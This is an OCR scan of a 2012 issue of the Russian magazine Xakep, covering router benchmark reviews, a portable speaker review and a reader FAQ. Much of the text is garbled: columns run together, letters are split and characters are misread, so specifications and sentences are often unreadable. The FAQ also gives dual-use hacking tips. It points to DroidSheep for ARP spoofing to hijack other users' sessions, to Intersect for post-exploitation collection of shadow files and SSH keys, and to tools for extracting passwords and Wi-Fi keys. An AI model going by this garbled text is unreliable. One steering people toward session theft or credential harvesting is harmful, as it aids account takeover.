роутер настраивается на подключение по данному протоколу через

патчкорд,- поехали!

WАN - порт. К LАN-порту подключается клиент.

МЕТОДИКА ТЕСТИРОВАНИЯ Вначале давай ознакомимся с методикой тестирования роутеров.

21 Тест nроизводительности NAT. Настройка аналогична nервому случаю, только подключение настраивается через Static IP. 3] Тест Wi-Fi. К LAN-nopтy маршрутизатора nодключается один

Начнем с железа. Н ам по надобятся сервер, клиент и ноутбук. Те­

клиент, а по беспроводной сети- второй. Таким образом, nропу­

стировать будем на платформе Wiпdows, поэтому на сервере уста­

ская трафик между двумя ПК, мы можем оценить производитель ­

новлена

Staпdaгd, а на остальных

ность именно беспроводной сети. Также настраивается шифрова­

ПК-

измерения результатов

ние

Microsoft Wiпdows Sегvег 2008 R2 Microsoft Wiпdows 7 Ultimate х64. Для

и нагрузки канала будет использоваться пакет от компании

lxia,

содержащий в себе конечные точки [eпdpoiпts, должны быть уста­ новлены на всех П К, участвующих в тесте] и консоль управления lxchaгiot.

lxchariot

имеет в своем арсенале множество скриптов, мы

WPA2-PSK

с ключом

AES.

Стоит отметить, что для теста будут использоваться одноименные WiFi-«свистки»: ASUS USB-N53, 0-Link DWA-160. TP-Link TLWN821 N и ZyXEL NWD2205 ЕЕ. Для остальных устройств применяем адаптер ASUS USB-N53 .

ХАКЕР

www.epidemz.net

04/159/2012


t1 ASUS RT-N66U «Ой, какой красивенький», - фраза дев ушки техноманьяка, ко­

торый приобрел себе

ASUS RT-N 66U.

Д ействительно, этот роутер

имеет необычный и привлекательный внешний вид. В компа­ нии

ASUS

учли недостатки предыдущей модели

ASUS RT-N56U

и сделали корпус из матового пластика вместо глянца, а кроме того роутер теперь имеет три внешних антенны, располагается

горизонтально, что более удобно, и е г о стало возможно повесить на стену. В общем, внешние недоработки предыдущего

N56U

ASUS RT-

были исправлены.

Роутер

ASUS RT-N66U

.,_ сочетает в себе мощь и пр остату настрой­

ки, интуитивно понятный пользовательский интерфейс позволит

разобраться в настройках даже новичк у. Устройство оснащено двумя портами

USB, так

чт о ты можешь одновременно использовать

внешний накопитель и принтер для доступа к ним по сети.

N66U

ASUS RT-

напичкан серьезным железом и потому показывает отличные

результаты в тестах: обошел конкурентов своего класса во всем, кроме одного параметра-скорость РРТР. Однако сегодня трудно найти провайдера, который бы обеспечивал доступ к интернету

на скорости, превышающей 100 М бит/с, а с этим AS US RT-N66U справится л е гко. Кстати, этот роутер поддерживает

Dual Access,

что

очень важно для большинства отечественных провайдеров.

ХАКЕР

04/159/ 2012

135

www.epidemz.net


FERRUM

D-LINK DSR-SOON ВНЕ КОНКУРСА

трогий и лакон и ч ны й вн е шн ий в ид 0-L iпk

OSR-50 0N

го в орит нам о с ерье з ной начи н ке и профессионал ь ной направл е ннос т и устрой с тва. К р е п ле н ия д л я сервер н ой с т о йки , переднее р ас положение ра з ъем о в и два WА N -порта- все это фичи промышленн о г о масштаба. Однако 0-L iпk

OSR- 500N

о с нащен US В - п орт о м и мо д ул ем Wi- Fi [в к рупн ы х с етях ч а щ е и с поль з у ютс я о тд е л ьн ы е точк и д ос туп а ! , бо льше подходящими для д о м а и мало г о офиса. Так и м об р азом, м ы пол у ч ае м гибрид , соче т а ющи й в с ебе функ циона л к ак дл я д о ма , так и для б ольшого о фиса, и пр и э т о м обла дающи й же л езом, ко т о р о е может выд е ржать серьез н у ю нагр узк у .

Н ас тройка

nр о д у ктов

0-Link OSR -5 00N а нал о г ичн а настройке остал ь ных 0-L ink. О с новные параметры может ска н фигу ри рова т ь

и новичок , благо nри с ут с твует мастер пашагавой нас т ройк и и н те р­ н е т а и с ет и

Wi-Fi.

Опи са ние всего функци а нала д анно г о дев ай са

н е укла д ы в ае т с я в фор мат статьи , так ч т о ск ажем л и шь , ч то вряд

ли най д ется че л о в ек , ко тор о г о не ус тр о ят возможности

0-Link

OSR -500 N. В се б ы хор о ш о, н о бо льш у ю ложку д егт я д обав ля ет сырая пр о ­ шивк а. П равда, инж е н е ры

0- Link

заявл я ют, ч то в с к о р о м време ни

в се буд е т ис п р а в л е н о . Хо т е ло с ь б ы в е рить , в е дь такие н есерьезны е n оказате л и ра бо т ы по РРТР и

Wi- Fi

с мотрят ся на фоне реа л ьной

производит ельн ости ус тро й с тв а n р осто смешно .

NETGEAR WNDR,OOO

lil

л авн ы е формы , че рн ый гля нц е вый пл ас тик, м я г кие , н е

раз дражающи е с вет о ди о ды ... У з н ае ш ь ? Пр а виль но, оче ­ редной продук т о т

NETGEAR-

роутер

WNO R4000 . Ус т рой­

с тво облада е т хоро ш ей произво дит е ль ностью , н а дежно и л егко

настраивае т ся. Н е с мо т ря на т о, что э то об щ и е сло в а,

NETGEAR

действит е ль н о с к аж д ой мод ел ь ю со в е рш е н ст в у ет с вои п оказате ли п р о и зво ди тельнос ти. Д а н ный р оу те р с т ал оче ре дн ой с т упе нью

11>

в лин ейке в ысокоп р о и з в о ди т е л ьны х устр о йств. Роуте р пор а д о вал

отли ч н ыми с к оростя ми РРТР и

NAT. П р о из во д ител ьн ос т ь б есп ро­ NETGEA R

водно й се ти ок аза лас ь на ур ов н е выше с р е дн ег о . Та кж е

WNOR4 000

ос н а щ е н U S В -порт ом , к кото ро му м ожет б ыт ь п о д к лю-

ч е н н акоп и тель для об щего д ос т у п а по се ти. П о дой д е т для т ех, кто пр ев ы ше всего ц ени т на д ежн о сть.

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ

Ин те рф ей сы : Б е сnроводная точка достуnа

Частотны й д и апазон : Б ез оп а сно с ть : Фун к ции р о у т е ра :

П о дде рж ка сое д и н е ни й : Доп о лни т е ль н о :

Wi-Fi:

D-Link DSR-500 N

1х WAN [RJ- 45[ 10/ 100/1000 Мбит/се к , 4х LAN [RJ-45[ 10/ 100/1000 М б ит/се к IEEE 802.11n 2.4 Г Гц, 5 Г Гц WE P, WPA/W PA-PSK, WPA 2/WPA 2- PSK [TK IP, AE S[ NAT, Oyn ON S, Static Rou ting, DH CP, QoS РРРо Е , РРТ Р, L2ТР, Sta tic/Oynamic IP EZSetup, WPS, м едиа- с ерв ер UPnP, AiDisk, 2х USB

2х WAN [RJ-45[ 10/100/1000 М бит/сек, 4х LAN [RJ-45[10/100/1000 М бит/сек IEEE 802.11n 2.4 Г Гц WEP, WPA/WPA- PSK, WPA 2/WPA2- PSK [TKIP, AE SI NAT, DynDN S, Static Rou ting, DH CP, QoS РРРо Е , РРТ Р, L2TP, Static/Dy namic IP WP S, 1х USB, у nр авле н ие че р ез консоль, техноло ги я Green

NETGEAR WNDR4000

1х WAN [RJ -45[ 10/100/1000 М б и т/се к , 4х LAN [RJ-45[ 10/100/1000 М б и т/се к IEEE 802.1 1 a/Ь/g /n 2.4 Г Гц, 5 Г Гц WEP, WPA/ WPA- PSK, WPA 2/WPA 2- PSK [TKIP, AESI NAT, OynON S, IPTV, Static Rout ing, ОНСР, QoS РРР о Е , РРТР, L 2Т Р, Static/Oynamic IP Д о n олни т ель н о: WP S, сче т ч и к т р афика, 1 х USB

ХАКЕР

136

www.epidemz.net

04 /159/2012


Сетевой форсаж

ZYXEL KEENETIC GIGA

m мя

ZyXE L хорошо

известно в кругу людей, которые еще помнят,

что такое д оступ винтернет через

Diai-Up.

По сей д ень ком­

пании уда ется держать марку и выпускать хо р ошие роутеры.

На этот ра з в нашей лаборатории оказался поклонникилинейки

Keenetic

ZyXEL

Keeпetic

Giga.

Теперь

могут радоваться появлению модели

с гигабитным коммутатором и двумя разъемами

USB

для подключе­

ния накопителей или, например, принтера. Устройс тв о по-прежнему обладает несколькими видами nодключе ни й к провайдеру- по вы­

деленной линии, через ЗG/4G - модем и по Wi-Fi. Также Keenetic Giga может работать в режиме точки достуnа и моста беспроводной сети .

Приобретая этот роутер, ты можешь б ыт ь уверен на 99.9 %, чт о у тебя н е

~

возникнет проблем с подключением к какому-либо провайдеру, причем не только интернет-, но и IРТV-nровайдеру. Веб-интерфейс- просто nесня. Наnример, на главном экране по казана исчерnывающая инф орма ция , даже таблица маршрутов п о м естилась. Сама <<а дминка >> д овольно шустрая, а настройки применяются за счи­

танные секунды. Чт о касается скоростных показателей, т о скорость

NAT

на очень nриличн ом уровне, а nри исnользовании РРТР о н а nросе­

1

дает до сре дних пок азателей. Пр оизводительность беспроводной сети также уверенно держится средних показателей.

TP-LINK TL-WR10,ЗND первую очередь это т роутер будет интересен тем, кто умеет

[]

считать деньги .

TP- Link TL-WR1 043 ND- самое

дешевое

уст ройство из нашего теста, при этом обладает гигабитным

коммутатором и USВ-портом. Однако данная модель показывает не са­ мые высокие скорости. Тут важ но пон ять, что ты хочеш ь от устройства: работу << из коробки >> и высокую nро и зводительность или длительную установку и настройк у сторонней прошивки? Если выбрать nервый

<4

вариант, то на сегодняшний день для

TP - Link TL-WR1043N D выnу­

стили стаб ильную прошивк у, которая дружелюбна, имеет не плохой наб ор функций и не зависает. Выбирая второй вариант, т ы получаешь

больший функционал (наnример, возможность nодключить принтер к USB-пop т y l , однако сторонние прошивки совсем не гарантируют стабильной работы. Р е ш а т ь тебе, но в любом случае мы можем смело у тв ерждать, что в данном ценовом се гм енте устройство выглядит очень nривлекательно. И з недостатков стан дартной прошивки можно отметить д олгое nрименение настроек.

TP-Link TLWR1043ND

_____ ZyXEL Keenetic Giga

___...";...... --------1xWAN IRJ-45110/100/1000 Мбит/сек, 4х LAN IR J-45110/100/1000 Мбит/сек IEEE 802.11a/b/g/n 2.4 ГГц WEP, WPA/WPA-PSK, WPA2/WPA2PSK IТKIP, AESI NAT, DynDNS, Static Routing, DHCP, QoS РРРоЕ, РРТР, L2ТР, Static/Dynamic IP Доnолнительно: WPS, 1х USB

1х WAN IRJ-45110/100/1000 М бит/сек, 4х LAN IRJ-45110/100/1000 Мбит/сек

IEEE 802.11n 2.4 Г Гц WEP, WPA/WPA-PSK, WPA2/WPA2PSK ITKIP. AESI NAT, DynDNS, Static Routing, DHCP. QoS РРРоЕ. РРТР. L2TP, Static/Dynam ic IP WPS, TVport, 2х USB

ВЫ В О Д Ы Итак , если ты все е щ е сомневаешься в своем решении, то мы тебе поможем. В зяв на вооружение

ASUS RT- N66 U,

ты получишь высокоnроизводительное и функцио­ нальное устройство- девайс имеет хороший за nа с по

скорос ти , который- мы уверены- станет еще больше nосле выхода новых прошивок.

ASUS RT-N66U

nолучает

<< Выбор редакции>>. Звание << Л уч ш ей покупки >> присваивается раутеру

ZyXE L Keenetic GIGA за его <<всеяднос т ь>> и хорошую производи­ тельность. NETGEAR WNDR4000 вnишется там, где нужна производительность и стабиль н ость. Н у а модель TPLink оказалась не только очень стабиль н ой, но и самой доступной во всем тесте. :с

Х АКЕР

137

04/159/2012

www.epidemz.net


FERRUM ПРОИЗВОДИТЕЛЬНОСТЬ WI-FI, 1 М, МБИТ/С

ASUS RT -N66U 0-Link OSR-500N NETGEAR WNOR4000 TP - Link TL-WR1043NO ZyXEL Keenetic GIGA •

FDX

Downstream

Upstream

о

Наглядное пр е вос хо дство

5 ГГц канала.

10

Что касается

20

2.4 Г Гц, то

30

впереди вс ех

40

50

60

70

80

90

100

11 о

ПРОИЗВОДИТЕЛЬНОСТЬ NAT, МБИТ/С

ASUS RT -N66U

ASUS RT -N66U

0-Link OSR-500N

0- Link OSR-500N

NETGEAR WNOR4000

NETGEAR WNOR4000

TP-Link TL-WR1 043NO

TP-Link TL-WR1 043NO

ZyXEL Keenetic GIGA

ZyX EL Keenetic GIGA 1

FDX

• •

Downstream Upstream

Д аже

ASUS RT-N66U

о

50

выглядит слабым на фоне Netgeaг

1

1

130

140

ASUS RT-N66U

ПРОИЗВОДИТЕЛЬНОСТЬ РРТР, МБИТ/С

1

120

1

100 150 200 250 300

• •

FDX Downstream

Upstгeam

о

Скорее бы и другие пока затели D-Liпk

WNDR4000

DSR-500N

500

1000

1500

были схожи с данными при тест е

NAT

ПРОИЗВОДИТЕЛЬНОСТЬ WI-FI, 6 М, МБИТ/С

ASUS RT-N66U 0-Link OSR-500N NETGEAR WNOR4000 TP-Link TL-WR1 043NO ZyXEL Keenetic GIGA •

FDX

Downstream

Upstream

о

10

20

30

40

50

60

70

80

90

На удалении ско рость уменьшилась пропорционально- вnолне закономерно

ХАКЕР

138

www.epidemz.net

04/159/201 2


FERRUM

МР15 В ых одная мощность: 1. 2х2 В т

PLUS

ПРОСТО КОНФЕТКА!

Представим картину: счастливчик, купивший новый

ством идут в се необходимые кабели, а также чехол для

ноутбук, возвращается домой. Зажарив в микроволновке

транс п орти р о в к и.

гору поп-корна и приготовив сладкой колы с о льдом, он

Вообще суще с твует множество портативных систем для

Диапазон воспроизводимы х

включает фильм, который давно хотел посмотреть. Каза­

воспроизвед е ния звука, но EdifieгMP15

ч ас тот :

лось бы- идиллия. Но на протяжении всего просмотра

лансирована в плане функцианала и удобства. Такую ко­

100-20000 Гц

Дин а ми к и :

Plus

хорошо сба­

• ди а м е тр: 40 мм • м аг нитн о е э кр а н и ро ва ни е : 6 Ом

не покидает ощущение, что что-то не так . А все из-за

лонку можн о в ез де возить с собой- карман оттягивать

звука, доносящегося из <<недодинамиков», встроенных

не будет, так как весит всего

В х одн а я чувствительность:

в ноутбук. Конечно, динамики лэптопов класса Hi-Eпd

бояться повр е дить мембрану динамика- она защищена

450

мВ

200

грамм. Также можно не

позволяют с комфортом посмотреть фильм и даже послу­

пластиковой дугой.

Упр а вление : с е ле кт о р

шать музыку, но что делать обладателям более демо­

Звук у EdifieгMP15

входа, восп р о изв еде ни е/

кратичных моделей? Ответить на этот вопрос поможет

у портативной колонки. В меру громкий, не перегружен­

В х одной импедан с:

кОм

пауза, пе р е к лю ч ен и е тр е к о в

и рад и оста н ц ий , гро мк ость

продукт компании Edifieг.

Р еж имы работы :

Edifier

3.5 мм

стерео вхо д , вос hр о и зве д е ни е

МР15

Plus

или

Plus такой, какой и должен быть

ный, без завышенных верхних частот. Эта система может

Edifier Audio

Сапdу

Plus- это

порта­

с лихвой зам е нить множество настольных вариантов

тивная акустическая система- миниатюрное устрой­

фирмы << ноун е йм >> большего размера. Для оценки звуча­

Га бариты : 200х6 0 х 33 мм

ство приятного дизайна. К нам в тестовую лабораторию

ния мы использовали список треков, в который входили

М ас с а :

попал семпл черного цвета, но данная модель представ­

песни разных стилей и фильмы. Понятно, что проелуши ­

с 5 0 - к а р т ы , FМ-р а ди о

0.2 кг

лена в различных цветовых вариантах на любой вкус.

вание lossless-фopмaтoв на этом устройстве бессмыс­

Система имеет несколько режимов работы. Первая и,

ленно, поэтому все звуковые дорожки воспроизводились

пожалуй, самая главная функция- это воспроизве­

в формате МРЗ. В качестве источника звука использова­

дение музыки через линейный вход. Питается система

лись ноутбук

от встроен н ого аккумулятора, а заряжается- от

ХАКЕР

USB.

Toshiba Satellite L 635-12Qи iPod паnа 5G.

Второй и третий режимы - FМ - приемник и воспроизве­

I:I§!:I•I!CD

дение музыки с 50-карты соответственно.

Пока меломаны сравнивают количество золота в своих

Настройка и управление системой происходят посред­

проводах , обычные юзеры уже выбрали Edifieг МР15

ством набора клавиш, расположенных в ряд вверху

Plus

устройства. Радует, что девай с снабдилинебольшим

ноутбука. Что же мы получаем? В первую очередь, воз­

дисплеем, на котором отображается нужная информа­

можность смотреть фильмы и слушать музыку в разы

ция- например частота радио и имя воспроизводимого

комфортнее и громче, чем через встроенную систему.

трека. Функции стандартны и не отли ч аются от большин­

Во-вторых, карманное радиосплеером для выходов на

в каче с тве портативной акустической системы для

ства оных у обычных портативных плееров, за исключе­

пр ироду.

нием того, что радио может работать без подключения

Таким образом, nосле знакомства с Edifieг МР15

наушников в качестве антенны. В комплекте с устрой-

осталось только хорошее вnечатление.

Plus

I

139

04 / 159/2012

www.epidemz.net


UNITS 1 FAQ UNITED

Коллективный разум

FAQ United

ЕСТЬ ВОПРОСЫ- ПРИСЫЛАЙ НА

f1:11

1.:.1

FAQri1REAL.XAKEP.RU

Установил

Windows 8 Con sumer Preview, которую Microsoft только что

1.

1tw 1st ed m а t г i х . с om /t га с 1wi k i /Тw i sted Wo гds 1,

Через << Автозагрузку ».

Wokkel[ wokkel . ik.пu l, SleekXM РР [c ode.

представила публике . Все отлично работает,

Заходим в папку C:\Useгs\<Useг Pгofile>\ Ар р О а ta\Roa m i пg\М i с гosoft\W i nd ows\ Staгt Menu\Pг ogгams\Sta гtup и добавля-

но один момент- сильно коробит отсут­

ем там ярлык, ссылаю щийся на <<ехрlогег.

П омимо этого есть замечательный серв ис

ствие кнопки « Пуск >>. Как же ее вернуть на

ехе

IMified [imified .com l, nозво ля ющ ий работать

вытащила из печки и еще т епленькой

место , назло nредnриимчивым парням из

Microsoft,

которые везде толкают свой

0000947ВО257}>>

2.

18.11

Выручит давно известная утилита

ViStaгt l lee-soft . com/v1staгt l, которая

изначально разрабатывалась для старушки

Windows

ХР, чтобы реализовать в ней меню

<<Пуск» НОВОМОДНЫХ на ТО время Vista/

Windows 7.

наибо ле е усnе шны е, но далеко не все.

с разными сетя ми через с п ециальный НТТР

Через стандартный nланировщик .

API.

Н ажимаем

Меtго-интерфейс?

n

shell:::{3080 F90 0- 07АО-110 9- ВО98-

google .com/p/sleekxmpp l - это, nожалуй,

По иронии судьбы она отлично

работает и в новой «восьмерке». Правда,

Win- R и через «Выполнить>> taskschd.msc. Дале е создаем но­ задачу, кликнув на <<Сгеаtе task>>. Важно

запускаем

f1:11

вую

..:".

сделать так, чтобы задача выполнялась на стар те системы, поэтому добав ля ем триггер

ITгiggeгs -7 Newl, выбирая <<Begi п the task : At log on>> и устанавлива я небольшую задерж ку I<<Oelay task fог: 5 seconds>>l. В качестве дей­ ствия выбираем запуск программы I<<Action :

Как быстро запустить на своем

ноутбуке виртуальную точку достуnа?

В качестве ОС используется

n

18.11

Windows .

Существует огромное количество

с п ециа льн ых утилит, о к ото ры х м ы уже

писал и. Н апример,

WiFi HotSpot Сгеаtог

l wifihotspotcгeator. com l позволяет реализо­

иконка << Пу ск>> будет накладываться на

Staгt а pгogгam>>l и в качестве приложения

вать это буквально в два клика. Н ужно лишь

другие элементы таскбара, что легко

указываем <<ехрlогег.ехе sheii:::{3080F900 -

указать

исправить, если через контекстное меню

07 АО-11 09- ВО98- 0000947ВО257}>>.

и выбрать сетевой интерфейс с выходом

<<Добавить в панель задач>> создать дополни­

тельный пустой тулбар. Инструкция

1.:.1

в картинках здесь : bit.ly/w7gsxv.

f1:11

1.:.1

n

Как сделать так, чтобы в

Windows 8 no умолчанию заnускалея не Меtго ­

интерфейс, а нормальный рабочий стол? Необходимо сделать так, чтобы на старте системы запускалея нужный

парольную фразу д ля

WPA 2

в и нет, чтобы расшарить подключение Для довольно посещаемого сервиса

к внешней сети.

хочу заnустить JаЬЬег-бота . Нагрузка

ожидается приличная, поэтому сразу

f1:11

Выбираю наиболее безопасный

хочется сделать по уму . Есть ли какие-то

1.:.1

мессенджер, который обеспечивал бы

готовые решения и заготовки, которые я

шифрование трафика. Какие есть вариан­

смогу использовать?

ты?

n

n

18.11

Существует огромное количество

библиотек для ХМРР-протокола, в том

числе, например, для

шелл.

SSIO ,

Python . Twisted

Woгds

18.11

А : Можно не сильно морочить себе

голову и использовать привычный

J аЬЬег. Во-первых, большинство серверов

КАК ОТЛАДИТЬ JS-KOД НА МОБИЛЬНОМ УСТРОЙСТВЕ?

m

ы стремительноприближаемсяк тому

сценарий или на лету поправить какие-нибудь

моменту, когда большинство людей

параметры в ООМ-модели страницы, но, увы,

будут выходитьвинтернет не с ком­

мобильных версий этих инструментов пока lи я

пьютеров, а с мобиль н ых планшетов и смарт­

уверен, что только пока! нет. Впрочем, с учетом

D

Существует такой проект как weinгe

[ phonegap . github . com/weinгe l, кото­ рый очень п охож на FiгeBug и

Web

lпspectoг, но обладает одним важным отличием

фонов. Возрастает сложность мобильных

огромного количества разработок в этой об­

-он предназначен для удаленной отладки

версий сайтов, но и их разработка усложня­

ласти, было бы странно, если разработчики

и, в частности, позволяет выполнять отладку

ется тем, что для браузеров в Andгoid и

не нашли бы подходящих альтернатив. Их

страниц на мобильных устройствах. Таким

нет таких мощных инструментов как F iгebug

несколько. Пр ичем разрабатываются они как

образом, дебаггер может быть запу щ ен на

[аддон для Fiгefoxl или Web ln spectoг [опция

просто энтузиастами, так и гигантами вроде

компьютере, а отлаживаемая страница ото­

WebKit-бpayзepoв l , которые программисты ис­

Adobe.

бражаться, ска жем, на смартфоне. Сейчас под­

iOS

держиваются Andгoid,

пользуют для отладк и сложного JS-кода . Н ет

iOS,

ВlасkВеггу,

webOS.

более удобного способа по ш агово выполнить

ХАКЕР

140

www.epidemz.net

04 /159/2012


FAQ UNITED

сейчас поддерживают работу через

безопасное SSL-соединение !даже если ты используешь

GTalk

БОЛЬШОЙ ВОПРОС

через браузер, весь

трафик по умолчанию идет по Н ТТРS]. Во-вторых, в большинстве клиентов можно

включить шифрование через OTR !Off-the-

Q

Recoгd]. Это протокол шифрования сообще­ ний для ceтeiii обмена мгновенными

В ЧЕМ СМЫСЛ ПРОТОКОЛА

Цель разработчиков

SPDY, ПРОДВИГАЕМО Г О СЕЙЧАС GOOGLE, И КАК ЕГО

время загрузки страницы на

необходимости менять сетевую инфра­

структуру !для этого он работает поверх

МОЖНО ИСПОЛЬЗОВАТЬ?

сообщениями. Основные свойства протоко­

привычного

ла:

в

шифрование сообщений- никто иной не сможет прочитать переписку;

аутентификация пользователей- уве­ ренность в том, кто является собеседни­

вается в

SPDY- уменьшить 50% без

TCPI. Для этого разработчики

SPDY lпроизносится как «:пи ди >> ] _

реализовали возможность передачи не­

-это экспериментальныи сетевои

скольких НТТР-запросов в одном па кете,

nротокол, который разрабаты­

ввели сжатие заголовков, отказавшись

Goog le и

при этом от избыточности !к примеру,

активно продвигается

ком;

в качестве замены устаревшему НТТР.

клиентунеобязатель но каждый раз пере­

слож ность в дешифровке- даже если

Важно, что это не просто проект !хотя про­

давать свой Useг-Ageпtl, реализовали

потеряны секретные ключи, прошла я

токол еще нах оди т ся в стадии ч ер новика]

возможность инициировать передачу

переписка не будет скомпрометирована;

-это уже работающая технология. Его уже

данных со стороны сервера и отдавать

данные клиен ту тогда, когда это необхо­

возможность отречения -третье лицо не

сейчас поддерживают браузеры

смо жет доказать, что сообщения написаны

Chгome и последняя версия Fiгefox, с его

кем -л ибо другому адресату.

помощью отдают НТТР-контент некоторые

пишет сам

сервисы

spdy-wh i tepapeг l, где он делится резуль­

OTR поддерживается !по умолчанию или

Google

!наnример,

Google

Gmail], а

димо. Очень подробно и доходчиво об этом

так же

Google l chгom1um.oгg/s pd y/

Twitteг.

татами бенчмарков, демонстрирующих

с помощью плагинов] в Adium, Pidgin, Kopete,

Разработанный в начале 90-х годов про­

эффективность

Мiгапdа

токол НТТР хотя и справляется с задачей

будут доступны исходник и веб-сервера,

по доставке содержимого веб-страниц,

поддерживающего

но делает это не оптимально. Один запрос

периментальный модуль для поддержки

1;,1 вать для деобфускации JavaScгipt­

на ОДНО ТСР-соединение, ВОЗМОЖНОСТЬ

кoдa НТМL-страницы и, nрежде всего,

инициировать подключе ние только со

зловредной нагрузки !уж кто-то, а nлохие

стороны клиента, несжатые и к тому же

протоко ла доступен для Apache !code. google.com/p/mod-spdy ], есть открытый проект на Python lgithub.com/mnot/nbht tp/

ребята всегда nрибегают к обфускации)?

избыточные заголов ки запросов и от­

tгee/spdy ]. Для Chгome, к слову, можно

ветов- все э то накладывает серьезные

nоставить аддон I Ьit.ly/x l deGJ I, который

r:t

l M,

Tгi lliaп,

qutiM, Psi+

и прочих.

Какие инструменты можно исnользо-

SPDY.

Там же очень скоро

SPDY.

Сейчас же экс­

...

Как известно, JavaScгipt-кoд,

накладные расходы на доставку содержи­

в адрес ной строке отображает, по какому

ILil

особенно зловредный, нередко

мого страниц, которая выражается в уве ­

протоколу передаются данные- НТТР

личенном времени загрузки страницы.

или

вставляется в обфусцированном !намеренно

SPDY.

запутанном] виде- ты можешь его прочи­ тать, но его логику понять без обработки невозможно. В нормальный вид он преобра­

Е-

О chrome:// net-interna ls /#events

с

- ... . .

зуетс я браузером уже во время выполнения.

:

Существует немало инструментов, по зво­

Capture

ляющих выполнить деобфускацию JS-кода

'

' '

~

Filter:

spd~

26

-например, Malzilla l malzi l la.souгcefoгge. ~t ]. В Сети можно найти достаточно

Export lmport

132250 SPDY SESSION

mail.google .com:443 (DIAECl)

примеров, как с ее помощью восстанавлива­

Proxy

182685 SPDY SESSION

plus.google.com :443

ется исходный код боевых нагрузок

Events

188532 SPDY SESSION

www .google.com:443

10

оfЗЗ8

Desc rlptlon

Source

(ОIАЕСТ] (OIR ECТ)

lпейло адов] различных сплоитов и сплоит­ паков.

Встроенная в Chrome утилита !чтобы е е запустить , достаточно набрать в адресной стро ке : chrome : //пet - iпter­ nals) подтв е ржда е т работу н ек оторы х сайтов через SPDY.

Adobe в рамках своего Adobe Lab недавно опублико­ вала инструмент Adobe Shadow ilabs. adobe.com/technolo gi es/shadow]. С помощью

ее код придется предварительно вставить

этого инструмента можно связать м ежду собой

в отлаживаемую стран ицу. При открытии стра­

в виде GUU-приложения, вторая же написа-

браузе р на компьютере !пока поддержива­

ницы специальный сниппет будет стучаться на

на на

етс я только Chгome] и браузер на мобильном

сервер и п ередавать отладочную информацию.

в списке поддерживаемых мобильных плат ­

устройстве !операция называется paiгing].

П роцесс отладки соответственно осуществля­

форм пока только Aпdгoid. Зато этот вариант

Таким образом удается добиться синхронизи­

ется через консоль. Н а сайте есть отлич ная

рекомендуют разработчики Seпcha- извест­

рованного серфинга и обновления просматри­ ваемых страниц одновременно на компьютере

инструкция ljsco n so l e.com/гemote-deb u gg in g. htm l] о том, как выполняется удален ная от­

мобильных приложений на

и, к примеру, планшете.

ладка.

2

ХАКЕР

Компания проекта

3

Помимо этого можно исполь зо­ вать удаленную JаvаSсгiрt -консоль

ljsconsole.com ] - правда, для этого

в

В качестве удаленной JаvаSсгiрt­ консоли также можно использовать

проект RemoteJS l b1t.ly/wF6ЗOE I.

Про ект имеет две версии: первая реализована

Python

и работает в консоли. Правда ,

ного фреймвор ка, реализующего интерфейс

HTML5.

141

04 /159/ 2012

www.epidemz.net


UNITS/ FAQ UNITED Можно ли запустить утилиты для

2.

проелушивания беспроводного эфира

3.

и инъектирования произвольных па кетов

(например, aiгcгack - ngl nод Andгoid?

Открыть меню << Debug>> <<Command line .. >> .

и выбратьтам

куда

1r.1 W

Анализ в свою очередь можно осуще­

где обитают разработчики

Подскажи: как максимально быстро

можно собрать информацию о Linux-

cиcтeмe, к которой был получен доступ.

В консоли выполнить команду

<<.pgmphystofile <filename»>, указав, именно нужно сохранить dump.

На известном форуме xda - developeгs.

com,

f1:t

.::.1

Инструментов для постэксплуатации

Linux-cиcтeм довольно много, в том

числе и в публичном доступе. Правда, надо иметь в виду, что подобные

кастомны"х прошивок и различных ха ков для

ствить с помощью известного фреймвор­

мобильных устройств, есть несколько тем по

ка Volatility lcode .goog le.com/p/volatility l.

утилиты могут сливать полученную инфор­

тому, как можно внести необходимые патчи

Есть также решения вроде Passware [1ost passwo rd .com/k i t-fo г е ns i с . htm l, поз в о­

мацию <<налево>>. Из функциональных тулз

ляющие извлечь из таких дампов различные

санную на

па роли.

ного она не делает, но упрощает массу задач,

подойдут не для любой nлатформы. Позтом у

f':t

если необходимо просто отснифать трафик

..:".

в беспроводной сети, то можно воспользо­

админ . Существует ли како й- нибудь способ

Утилита соберет файлы с па ролями [passwd, shadow, gshadow, master.passwd), скопирует SSН-ключи !открытые и секретные), со­

ваться связкой утилит Dгo idSheep

восстановить пасс, кроме как найти этого

берет информацию о запущенных процессах

[droidsheep .de l и Shark for Root l.!!.i.tbl

самого админа?

и установленных приложениях,

в ядро Andгoid и благодаря этому запустить

.!1.l.tbl

aiгodump и aircrack-ng [наnример, znrtiB I. Однако, во-первых, предложенные

Python.

Ничего сверхъестествен­

которые пришлось бы выполнять вручную.

действия- нетривиальны, а во-вторых,

wpexhд l. Первая, напомню, выnолняет ARP

Есть точка доступа , па роль для

которой устанавливал предыдущий

историю

n

и извлекает из эфира пользова­

Spoofing

можно выделить l пteгsect, полностью напи­

Bash

вытащит

и задачи планировщика,

Универсального способа нет, и более

просканирует внутреннюю сеть на <<живые>>

того- очень часто это невозможно.

хосты, попробует определить установленные

тельские сессии [например, для ВКонтакт еl.

W

Вторая же позволяет сохранить перехвачен­

Однако все сильно зависит от раутера

в системе антивирусы и файрволы. Это лишь

ные данные в РСАР-формате, которые по зже

и прошивки , которая в нем используется.

малая часть функционала.

можно проанализировать, например,

Например, для

с по мощью Wireshaгk.

вытащить у далось, в чем мне помог один пост

f1:t

на форуме [wl 500g.infol. Для этого, правда, пришлось с качать прошивку OpenWRT [в ней по умолчанию включен telnetl и загрузить

Как выполнить дамп оперативной

памяти виртуальной машины,

..:".

ASUS WL-500gP

па роль

f1:t .::.1

в W i ndows-cиcтeмe?

n

пригодный для последующего анализа?

через механизм безопасного обновления

n

firmwa r e !необходимо отключить питание роутера, зажать кнопку <<гeset settings >>

W

В случае с VMware вс~ проще простого: для каждого snapshot а, созданного

W

Как вытащит~ ключи для безопасной

беспроводнои сети, сохраненные

Как вариант можно воспользоваться

утили той вроде WirelessKeyView [ni rsof t. net/uti ls/wireless_key.html), которая

и включить роутер, после чего тот получает

без труда извлечет их из системы и расшиф­

адрес

192.168.1.1 и позволяет залить прошивку через ftpl . Весь секрет в том, что даже после

рует. Но есть способ обойтись и без сторон­

памяти. В случае с VirtuaiBox'oм можно

перезагруз ки предыдущие настройки

Wiгeless Zего Coпfiguгation [та, которая

поступить следующим образом.

остаются в

отвечает за беспроводные подключения)

для виртуальной машины, есть файл с расширением

.vmem -

это и есть дамп

х ранит настройки подключения в профилях.

паролем по умолчанию и посмотреть предыду­

Их список можно получить, набрав команду:

